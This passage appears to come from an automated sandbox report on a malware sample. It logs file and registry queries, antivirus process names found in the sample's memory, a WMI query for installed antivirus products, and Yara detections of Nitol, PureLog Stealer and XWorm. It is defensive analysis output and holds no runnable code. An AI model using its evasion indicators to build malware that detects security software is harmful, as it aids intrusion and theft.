                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,36_2_029D5BD7
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: GetLocaleInfoA,36_2_029DA810
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\alg.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\Public\alpha.pifQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTF44A.tmp VolumeInformation
                Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTF45B.tmp VolumeInformation
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\ VolumeInformation
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\System32\msdtc.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\ VolumeInformation
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\System32\Locator.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\SensorDataService.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\snmptrap.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\Spectrum.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AF920C GetLocalTime,4_2_02AF920C
                Source: C:\Windows\System32\AppVClient.exeCode function: 22_2_00740080 VirtualFree,VirtualFree,VirtualAlloc,GetUserNameW,GetComputerNameW,GetComputerNameW,22_2_00740080
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AFB78C GetVersionExA,4_2_02AFB78C
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected Nitol
                Source: Yara matchFile source: Process Memory Space: wdmvmswJ.pif PID: 2056, type: MEMORYSTR
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1e8fecae.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.213f0000.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.852.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1eb40f08.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e720000.1151.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.268b0f08.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e760000.1094.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e7a0000.922.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e750000.1112.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1fd46478.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.213f0000.13.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e610000.1102.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e780000.1055.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1fd45570.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e720000.1149.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e750000.1111.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e7a0000.904.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.279e5570.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e610000.1103.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e6f0000.915.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.27a02b90.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.3.wdmvmswJ.pif.244ea0a0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e770000.1053.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.265becae.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e760000.1115.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e730000.1154.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e7a0000.941.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e710000.927.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1eb40000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e790000.1066.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e790000.1064.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e780000.1058.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1eb40000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e6f0000.914.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e760000.1093.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.848.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e7a0000.1060.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.919.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e6d0000.1068.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.3.wdmvmswJ.pif.1c684410.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e7a0000.865.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e740000.1160.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e710000.845.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1e8fecae.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.29240000.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e790000.1062.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e710000.846.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.268b0000.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e790000.1067.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e760000.1092.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e740000.1161.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e730000.1155.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.853.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.849.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e620000.1099.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e710000.925.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.279e6478.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.29240000.13.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e7a0000.921.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e730000.1152.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1fd62b90.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e620000.1100.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e790000.1061.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.851.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e720000.1148.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.27a02b90.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e620000.1097.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e740000.1162.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e740000.928.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e6b0000.1095.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.918.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e7a0000.942.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e720000.1150.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.3.wdmvmswJ.pif.244ea0a0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.917.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e5f0000.1165.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.3.wdmvmswJ.pif.1c684410.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e620000.1101.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e770000.1054.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e6c0000.1163.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e780000.1056.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1e8ffbb6.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e6f0000.913.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e750000.1110.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.268b0f08.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e620000.1098.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e730000.1153.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e760000.1002.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e710000.924.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e780000.1057.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.265becae.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e740000.1159.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1eb40f08.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.265bfbb6.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e790000.1065.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e610000.1096.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.265bfbb6.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1fd62b90.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1fd45570.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e6f0000.843.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e710000.923.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e740000.929.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e770000.1052.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e6c0000.1164.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1fd46478.11.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.268b0000.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1e8ffbb6.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.850.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e7a0000.903.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.279e6478.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e8e0cd8.17.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.847.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.920.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e790000.1063.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.279e5570.11.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e6f0000.916.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e740000.1158.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e6f0000.844.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e8e0cd8.17.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e7a0000.866.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e7a0000.1059.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e770000.1051.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000026.00000002.1848536058.000000001FD45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.1848938336.00000000213F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.1798010411.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.1840076965.000000001E8BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.1553023677.000000001E8E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.1795060712.00000000279E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.1840971745.000000001EB40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.1782173123.00000000268B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000003.1766990632.000000001C684000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Yara detected XWorm
                Source: Yara matchFile source: 00000026.00000002.1842028459.000000001EDB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.1782690545.0000000026A57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wdmvmswJ.pif PID: 2056, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Nitol
                Source: Yara matchFile source: Process Memory Space: wdmvmswJ.pif PID: 2056, type: MEMORYSTR
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1e8fecae.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.213f0000.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.852.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1eb40f08.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e720000.1151.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.268b0f08.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e760000.1094.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e7a0000.922.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e750000.1112.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1fd46478.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.213f0000.13.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e610000.1102.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e780000.1055.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1fd45570.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e720000.1149.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e750000.1111.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e7a0000.904.unpack, type: UNPACKEDPE
